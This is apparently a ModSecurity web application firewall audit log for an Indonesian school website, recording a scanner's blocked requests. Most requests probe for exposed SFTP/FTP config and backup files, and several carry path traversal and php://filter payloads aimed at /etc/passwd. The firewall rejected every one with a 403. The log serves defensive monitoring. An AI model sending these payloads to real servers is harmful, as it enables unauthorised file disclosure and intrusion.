Stopwatch2: 1746069971128600 1534; combined=685, p1=313, p2=348, p3=0, p4=0, p5=24, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1d448337-Z--
--743d0500-A--
[01/May/2025:10:26:14 +0700] aBLp1o144kZ4LAGlEgzyBQAAANU 103.236.140.4 51140 103.236.140.4 8181
--743d0500-B--
GET /ftps.config HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--743d0500-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--743d0500-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746069974171484 2408 (- - -)
Stopwatch2: 1746069974171484 2408; combined=1048, p1=455, p2=560, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--743d0500-Z--
--4efa7659-A--
[01/May/2025:10:26:14 +0700] aBLp1sVMAgMJpNzaVtKrEAAAAFQ 103.236.140.4 51150 103.236.140.4 8181
--4efa7659-B--
GET /ftp-config.conf HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4efa7659-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4efa7659-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746069974374557 1932 (- - -)
Stopwatch2: 1746069974374557 1932; combined=705, p1=316, p2=361, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4efa7659-Z--
--db50e102-A--
[01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyDwAAANA 103.236.140.4 51198 103.236.140.4 8181
--db50e102-B--
GET /prevlaravel/sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--db50e102-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--db50e102-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069975316335 844 (- - -)
Stopwatch2: 1746069975316335 844; combined=306, p1=269, p2=0, p3=0, p4=0, p5=37, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--db50e102-Z--
--fb924e71-A--
[01/May/2025:10:26:15 +0700] aBLp14144kZ4LAGlEgzyEgAAANE 103.236.140.4 51208 103.236.140.4 8181
--fb924e71-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--fb924e71-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb924e71-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746069975517617 756 (- - -)
Stopwatch2: 1746069975517617 756; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb924e71-Z--
--c08c9900-A--
[01/May/2025:10:26:49 +0700] aBLp-cVMAgMJpNzaVtKrjwAAAEc 103.236.140.4 52808 103.236.140.4 8181
--c08c9900-B--
GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--c08c9900-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c08c9900-E--
--c08c9900-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070009673860 2180 (- - -)
Stopwatch2: 1746070009673860 2180; combined=626, p1=430, p2=168, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c08c9900-Z--
--fe22a462-A--
[01/May/2025:10:26:49 +0700] aBLp-Sgtr0Qsi1mFAsMJFwAAAIE 103.236.140.4 52818 103.236.140.4 8181
--fe22a462-B--
GET /download_video.php?path=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--fe22a462-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fe22a462-E--
--fe22a462-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070009875108 2164 (- - -)
Stopwatch2: 1746070009875108 2164; combined=620, p1=450, p2=142, p3=0, p4=0, p5=28, sr=98, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fe22a462-Z--
--ae9f546a-A--
[01/May/2025:10:26:50 +0700] aBLp-sVMAgMJpNzaVtKrkwAAAEM 103.236.140.4 52832 103.236.140.4 8181
--ae9f546a-B--
GET /index.php?page=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--ae9f546a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ae9f546a-E--
--ae9f546a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070010077119 1630 (- - -)
Stopwatch2: 1746070010077119 1630; combined=427, p1=325, p2=82, p3=0, p4=0, p5=20, sr=52, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ae9f546a-Z--
--c122b41f-A--
[01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKQAAAAM 103.236.140.4 52846 103.236.140.4 8181
--c122b41f-B--
GET /download_gambar.php?path=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--c122b41f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c122b41f-E--
--c122b41f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_gambar.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070010279791 1955 (- - -)
Stopwatch2: 1746070010279791 1955; combined=593, p1=423, p2=140, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c122b41f-Z--
--15df6108-A--
[01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANKwAAABQ 103.236.140.4 52852 103.236.140.4 8181
--15df6108-B--
GET /download_video.php?file=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--15df6108-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--15df6108-E--
--15df6108-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070010480800 2504 (- - -)
Stopwatch2: 1746070010480800 2504; combined=672, p1=467, p2=165, p3=0, p4=0, p5=40, sr=114, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--15df6108-Z--
--6ecc8048-A--
[01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANLQAAAA8 103.236.140.4 52866 103.236.140.4 8181
--6ecc8048-B--
GET /download.php?path=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--6ecc8048-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ecc8048-E--
--6ecc8048-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070010682824 1496 (- - -)
Stopwatch2: 1746070010682824 1496; combined=478, p1=344, p2=105, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ecc8048-Z--
--fc928f2f-A--
[01/May/2025:10:26:50 +0700] aBLp-uVeTgVPHjrSAYANMAAAAAI 103.236.140.4 52876 103.236.140.4 8181
--fc928f2f-B--
GET /download.php?file=/etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--fc928f2f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fc928f2f-E--
--fc928f2f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070010883700 1619 (- - -)
Stopwatch2: 1746070010883700 1619; combined=407, p1=301, p2=85, p3=0, p4=0, p5=21, sr=54, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fc928f2f-Z--
--775f335f-A--
[01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzycgAAAM4 103.236.140.4 52890 103.236.140.4 8181
--775f335f-B--
GET /download.php?file=../../../../etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--775f335f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--775f335f-E--
--775f335f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070011085078 2023 (- - -)
Stopwatch2: 1746070011085078 2023; combined=663, p1=491, p2=142, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--775f335f-Z--
--e5fb8347-A--
[01/May/2025:10:26:51 +0700] aBLp-4144kZ4LAGlEgzydQAAAMc 103.236.140.4 52900 103.236.140.4 8181
--e5fb8347-B--
GET /download_worksheet.php?action=/etc/passwd HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--e5fb8347-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e5fb8347-E--
--e5fb8347-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746070011286155 2171 (- - -)
Stopwatch2: 1746070011286155 2171; combined=597, p1=438, p2=133, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e5fb8347-Z--
--4466d710-A--
[01/May/2025:10:33:59 +0700] aBLrp4144kZ4LAGlEgz3qgAAANA 103.236.140.4 44870 103.236.140.4 8181
--4466d710-B--
GET /config.inc.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--4466d710-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4466d710-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070439988097 2413 (- - -)
Stopwatch2: 1746070439988097 2413; combined=843, p1=414, p2=394, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4466d710-Z--
--9a2d4546-A--
[01/May/2025:10:34:00 +0700] aBLrqCgtr0Qsi1mFAsMNfAAAAJI 103.236.140.4 44906 103.236.140.4 8181
--9a2d4546-B--
GET /config.inc.php.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 164.92.74.66
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--9a2d4546-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a2d4546-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746070440780246 2583 (- - -)
Stopwatch2: 1746070440780246 2583; combined=934, p1=417, p2=490, p3=0, p4=0, p5=27, sr=84, sw=0, l=0, gc=0
